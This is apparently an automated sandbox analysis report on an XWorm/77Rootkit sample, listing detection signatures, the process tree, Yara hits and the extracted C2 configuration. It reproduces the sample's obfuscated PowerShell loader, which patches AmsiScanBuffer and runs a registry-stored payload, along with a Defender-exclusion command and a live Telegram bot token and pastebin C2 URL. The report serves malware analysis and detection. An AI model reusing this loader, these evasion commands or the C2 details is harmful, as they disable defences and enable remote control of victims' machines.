Windows Analysis Report
RdLfpZY5A9.exe

Overview

General Information

Sample name: RdLfpZY5A9.exe (renamed because original name is a hash value)
Original sample name: b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c.exe
Analysis ID: 1575208
MD5: 28db4677dcbbaa0a4c5adbc02c9da4f3
SHA1: e1f0199ed131a90e25204399e4e876da64ea3ba5
SHA256: b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c
Tags: exe, user-Chainskilabs

Detection

77Rootkit, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected 77Rootkit
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates files in the system32 config directory
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • RdLfpZY5A9.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\RdLfpZY5A9.exe" MD5: 28DB4677DCBBAA0A4C5ADBC02C9DA4F3)
    • Install.exe (PID: 7408 cmdline: "C:\ProgramData\Install.exe" MD5: B5F6C9AC3389F5E61B4C750CF950E27C)
    • KrnlSetupSus.exe (PID: 7424 cmdline: "C:\ProgramData\KrnlSetupSus.exe" MD5: 6435792D63BE630506EB9EEBBD1E3878)
      • powershell.exe (PID: 7712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7452 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+'r'+'e'+[Char](115)+'s',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+'c'+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qnwSIaibfbWlFcLLMVH=zDgZeIZuxWRL @([String])([IntPtr]);$MmSYyEqPQkjxSlmVVTEznD=zDgZeIZuxWRL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$saKjRLExuCO=$ysqdxYMCHCLNa.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$lUrimOjxLHSAgu=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$saKjRLExuCO,[Object]('L'+[Char](111)+'ad'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$BgYJLHVZjDSQrMGil=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$saKjRLExuCO,[Object]('V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$kIpEHaJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lUrimOjxLHSAgu,$qnwSIaibfbWlFcLLMVH).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.dll');$rLMnIHfZQPDuCMOEo=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$kIpEHaJ,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+''+'B'+'uf'+[Char](102)+''+[Char](101)+'r')));$MjFQYglbdB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BgYJLHVZjDSQrMGil,$MmSYyEqPQkjxSlmVVTEznD).Invoke($rLMnIHfZQPDuCMOEo,[uint32]8,4,[ref]$MjFQYglbdB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rLMnIHfZQPDuCMOEo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BgYJLHVZjDSQrMGil,$MmSYyEqPQkjxSlmVVTEznD).Invoke($rLMnIHfZQPDuCMOEo,[uint32]8,0x20,[ref]$MjFQYglbdB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 7680 cmdline: C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 372 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 888 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 660 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1224 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1392 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1412 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1596 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1704 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1716 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1740 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1800 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1876 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2012 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2020 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2028 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 960 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2092 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • spoolsv.exe (PID: 2204 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
      • svchost.exe (PID: 2304 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2420 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": ["https://pastebin.com/raw/Zx6DUkf9"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "driver.exe", "Telegram Token": "6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI", "Telegram Chatid": "5999137434"}
{"C2 url": "https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
C:\ProgramData\ntoskrnl.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security |
C:\ProgramData\ntoskrnl.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\ProgramData\ntoskrnl.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\ProgramData\ntoskrnl.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
C:\ProgramData\ntoskrnl.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xff76:$s6: VirtualBox
  • 0xfed4:$s8: Win32_ComputerSystem
  • 0x12cc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12d5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12e72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1178c:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_Rootkit77 | Yara detected 77Rootkit | Joe Security |
00000004.00000002.1516696154.000001A854270000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_Rootkit77 | Yara detected 77Rootkit | Joe Security |
00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xfd76:$s6: VirtualBox
  • 0xfcd4:$s8: Win32_ComputerSystem
  • 0x12ac0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12b5d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12c72:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1158c:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
2.2.Install.exe.7c40b0.1.raw.unpack | JoeSecurity_Rootkit77 | Yara detected 77Rootkit | Joe Security |
4.2.powershell.exe.1a84bcc81a8.13.unpack | JoeSecurity_Rootkit77 | Yara detected 77Rootkit | Joe Security |
4.2.powershell.exe.1a854270000.16.unpack | JoeSecurity_Rootkit77 | Yara detected 77Rootkit | Joe Security |
2.2.Install.exe.7c40b0.1.unpack | JoeSecurity_Rootkit77 | Yara detected 77Rootkit | Joe Security |
0.2.RdLfpZY5A9.exe.1294ef08.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

                              System Summary

Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 